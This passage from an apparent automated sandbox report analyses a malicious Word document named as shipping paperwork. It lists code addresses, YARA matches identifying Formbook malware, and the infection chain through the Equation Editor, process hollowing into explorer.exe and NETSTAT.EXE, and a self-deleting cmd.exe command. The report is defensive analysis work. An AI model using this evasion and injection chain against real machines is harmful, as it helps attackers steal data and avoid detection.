          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020BFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020C1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E8270 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E82F0 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E81BA NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E826A NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000E82EB NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023E05A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0022A1FB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0022A200
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023DA6F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023CAA2
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023D2CF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00224327
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00224330
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00224550
          Source: C:\Users\Public\vbc.exeCode function: 9_2_002225D0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00222714
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00401174
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041CABA
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00408C5B
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041C4CF
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041BD5B
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041B502
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0075905A
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00743040
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0076D005
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0073E0C6
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007E1238
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0073E2E9
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0078A37B
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00747353
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00742305
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007663DB
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0073F3CF
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0077D47D
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00775485
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00751489
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00786540
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0074351F
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0075C5F0
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007E2622
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0074E6C1
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00744680
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007757C3
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0074C7BC
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007C579A
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0076286D
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0074C85C
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007C5955
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007569FE
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007429B2
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007E098E
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007F3A83
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00767B00
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0073FBD7
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007CDBDA
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007ECBA4
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0074CD5B
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00770D3B
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007DFDDD
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0075EE4C
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00772E2F
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0076DF7C
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00750F3F
          Source: C:\Users\Public\vbc.exeCode function: 11_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 11_1_00401174
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041CABA
          Source: C:\Users\Public\vbc.exeCode function: 11_1_00408C5B
          Source: C:\Users\Public\vbc.exeCode function: 11_1_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041C4CF
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041BD5B
          Source: C:\Windows\explorer.exeCode function: 13_2_029348F9
          Source: C:\Windows\explorer.exeCode function: 13_2_029372FF
          Source: C:\Windows\explorer.exeCode function: 13_2_02939062
          Source: C:\Windows\explorer.exeCode function: 13_2_0293B5B2
          Source: C:\Windows\explorer.exeCode function: 13_2_0293A7C7
          Source: C:\Windows\explorer.exeCode function: 13_2_02934902
          Source: C:\Windows\explorer.exeCode function: 13_2_02937302
          Source: C:\Windows\explorer.exeCode function: 13_2_02935362
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02171238
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020CE2E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D2305
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D7353
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0211A37B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_021763BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020CF3CF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020F63DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020FD005
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D3040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020E905A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020CE0C6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0211A634
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02172622
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D4680
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020DE6C1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0215579A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020DC7BC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_021057C3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0210D47D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020E1489
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02105485
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D351F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02116540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020EC5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02183A83
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020F7B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0217CBA4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0215DBDA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020CFBD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020DC85C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020F286D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0216F8EE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02155955
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0217098E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D29B2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020E69FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02102E2F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020EEE4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020E0F3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020FDF7C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_02100D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020DCD5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_0216FDDD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000EC4CF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000EB502
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000ECABA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000D8C5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000D8C60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000EBD2F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000D2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000D2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_000D2FB0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe 98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 020CDF5C appears 118 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 020CE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0213F970 appears 81 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0211373B appears 238 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02113F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007AF970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0078373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0A0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00783F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073DF5C appears 118 times
          Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOCX@9/22@1/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$L Shipping doc & Shipment tracking details.docxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5AF.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: netstat.pdb source: vbc.exe, 0000000B.00000002.2145782499.00000000003E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 11.2.vbc.exe.400000.2.unpack .text:ER;.data:W;.fipuh:W;.wuta:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: vbc[1].exe.7.drStatic PE information: section name: .fipuh
          Source: vbc[1].exe.7.drStatic PE information: section name: .wuta
          Source: vbc[1].exe.7.drStatic PE information: section name: .new
          Source: vbc.exe.7.drStatic PE information: section name: .fipuh
          Source: vbc.exe.7.drStatic PE information: section name: .wuta
          Source: vbc.exe.7.drStatic PE information: section name: .new
          Source: C:\Users\Public\vbc.exeCode function: 9_2_002370D6 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023D921 pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023C955 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023C9A2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023C9AB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023CA0C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0022D32A push 00000064h; retf
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0023743D push esi; iretd
          Source: C:\Users\Public\vbc.exeCode function: 9_2_002364CB push 0000000Dh; retf
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00237516 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 9_2_03F2E2D7 push ebx; iretd
          Source: C:\Users\Public\vbc.exeCode function: 9_2_03F2E4AD push ebx; iretd
          Source: C:\Users\Public\vbc.exeCode function: 9_2_03F2E46F push ebx; iretd
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00415B36 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041C381 pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0040BD8A push 00000064h; retf
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00415E9D push esi; iretd
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00415F76 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00414F2B push 0000000Dh; retf
          Source: C:\Users\Public\vbc.exeCode function: 11_2_0073DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_1_00415B36 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041C381 pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041B402 push eax; ret
